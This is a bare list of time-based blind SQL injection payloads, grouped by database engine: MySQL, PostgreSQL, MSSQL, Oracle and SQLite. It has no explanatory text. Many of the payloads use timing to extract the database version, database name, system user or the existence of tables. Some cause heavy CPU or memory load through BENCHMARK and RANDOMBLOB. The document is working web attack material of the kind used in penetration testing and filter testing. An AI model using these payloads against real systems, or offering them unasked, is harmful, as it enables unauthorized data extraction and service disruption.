# SQLi Time-Based Blind Payloads — per database engine
# MySQL
' AND SLEEP(5)--
' AND SLEEP(5)#
' OR SLEEP(5)--
' OR SLEEP(5)#
' AND (SELECT SLEEP(5))--
' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
' XOR (SELECT(SLEEP(5)))--
1' AND SLEEP(5)-- -
' AND IF(1=1,SLEEP(5),0)--
' AND IF(1=2,SLEEP(5),0)--
' AND IF(SUBSTRING(version(),1,1)='5',SLEEP(5),0)--
' AND IF(SUBSTRING(database(),1,1)>'a',SLEEP(5),0)--
' AND IF((SELECT COUNT(*) FROM users)>0,SLEEP(5),0)--
' AND BENCHMARK(5000000,SHA1('test'))--
' AND BENCHMARK(10000000,MD5('test'))--
1;SELECT IF(1=1,SLEEP(5),0)--
'; SELECT SLEEP(5)--
' UNION SELECT SLEEP(5)--
' UNION SELECT IF(1=1,SLEEP(5),0)--
' AND (SELECT 1 FROM (SELECT SLEEP(5))a)--
' OR IF(1=1,SLEEP(5),'false')--
# PostgreSQL
' AND pg_sleep(5)--
' AND (SELECT pg_sleep(5))--
'; SELECT pg_sleep(5)--
' OR pg_sleep(5)--
' AND CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END--
' AND 1=(SELECT CASE WHEN (1=1) THEN (SELECT pg_sleep(5)) END)--
' AND (SELECT CASE WHEN SUBSTRING(version(),1,1)='P' THEN pg_sleep(5) ELSE pg_sleep(0) END)--
' AND (SELECT CASE WHEN current_database()='postgres' THEN pg_sleep(5) ELSE pg_sleep(0) END)--
' || (SELECT pg_sleep(5))--
';SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END--
# MSSQL
' WAITFOR DELAY '0:0:5'--
'; WAITFOR DELAY '0:0:5'--
' AND 1=1 WAITFOR DELAY '0:0:5'--
'; IF (1=1) WAITFOR DELAY '0:0:5'--
'; IF (1=2) WAITFOR DELAY '0:0:5'--
'; IF (SELECT LEN(DB_NAME()))>0 WAITFOR DELAY '0:0:5'--
'; IF (SELECT SUBSTRING(DB_NAME(),1,1))='m' WAITFOR DELAY '0:0:5'--
'; IF SYSTEM_USER='sa' WAITFOR DELAY '0:0:5'--
' IF(1=1) WAITFOR DELAY '0:0:5' ELSE WAITFOR DELAY '0:0:0'--
';DECLARE @d VARCHAR(9999);SET @d=CONVERT(VARCHAR(9999),'0:0:5');WAITFOR DELAY @d--
# Oracle
' AND 1=DBMS_PIPE.RECEIVE_MESSAGE('a',5)--
' OR 1=DBMS_PIPE.RECEIVE_MESSAGE('a',5)--
' AND DBMS_LOCK.SLEEP(5)=0--
'; BEGIN DBMS_LOCK.SLEEP(5); END;--
' AND 1=(SELECT CASE WHEN (1=1) THEN DBMS_PIPE.RECEIVE_MESSAGE('a',5) ELSE 0 END FROM dual)--
' AND UTL_INADDR.GET_HOST_NAME('10.0.0.1') IS NOT NULL--
# SQLite
' AND 1=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))--
' AND RANDOMBLOB(500000000)--
